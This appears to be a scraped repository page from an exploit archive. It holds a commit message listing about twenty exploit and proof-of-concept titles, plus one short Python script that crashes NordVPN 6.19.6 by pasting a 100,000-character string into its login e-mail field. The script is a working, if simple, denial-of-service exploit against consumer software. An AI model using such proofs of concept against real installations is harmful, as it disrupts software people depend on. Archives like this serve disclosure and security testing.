d622832ea0
21 changes to exploits/shellcodes KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC) KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH) Jzip - Buffer Overflow (Denial of Service) (SEH Unicode) Jzip - Buffer Overflow (PoC) (SEH Unicode) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC) Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite) Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite) STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC) STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite) Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service) Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH) Netatalk 3.1.12 - Authentication Bypass (PoC) IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC) Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC) IP-Tools 2.50 - Local Buffer Overflow (PoC) Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite) FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC) FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite) Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC) Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite) AirDroid 4.2.1.6 - Denial of Service FutureDj Pro 1.7.2.0 - Denial of Service NordVPN 6.19.6 - Denial of Service (PoC) River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH) IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter) River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH) Evince - CBT File Command Injection (Metasploit) Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure Netatalk - Bypass Authentication Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit) NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit) Indusoft Web Studio 8.1 SP2 - Remote Code Execution Smoothwall Express 3.1-SP4 - Cross-Site Scripting Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset IPFire 2.21 - Cross-Site Scripting MyBB Bans List 1.0 - Cross-Site Scripting VA MAX 8.3.4 - Authenticated Remote Code Execution CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting Webiness Inventory 2.3 - 'email' SQL Injection
22 lines
No EOL
705 B
Python
Executable file
22 lines
No EOL
705 B
Python
Executable file
# -*- coding: utf-8 -*-
|
|
# Exploit Title: NordVPN 6.19.6 - Denial of Service (PoC)
|
|
# Date: 07/02/2019
|
|
# Author: Alejandra Sánchez
|
|
# Vendor Homepage: https://nordvpn.com/
|
|
# Software Link: https://downloads.nordcdn.com/apps/windows/10/NordVPN/latest/NordVPNSetup.exe
|
|
# Version: 6.19.6
|
|
# Tested on: Windows 10
|
|
|
|
# Proof of Concept:
|
|
# 1.- Run the python script, it will create a new file "PoC.txt"
|
|
# 2.- Copy the text from the generated PoC.txt file to clipboard
|
|
# 3.- Open NordVPN.exe
|
|
# 3.- Paste clipboard in 'E-mail' field
|
|
# 4.- Write '1234' in 'Password' field
|
|
# 5.- Clic on button -> Sign In
|
|
# 6.- Crashed
|
|
|
|
buffer = "\x41" * 100000
|
|
f = open ("PoC.txt", "w")
|
|
f.write(buffer)
|
|
f.close() |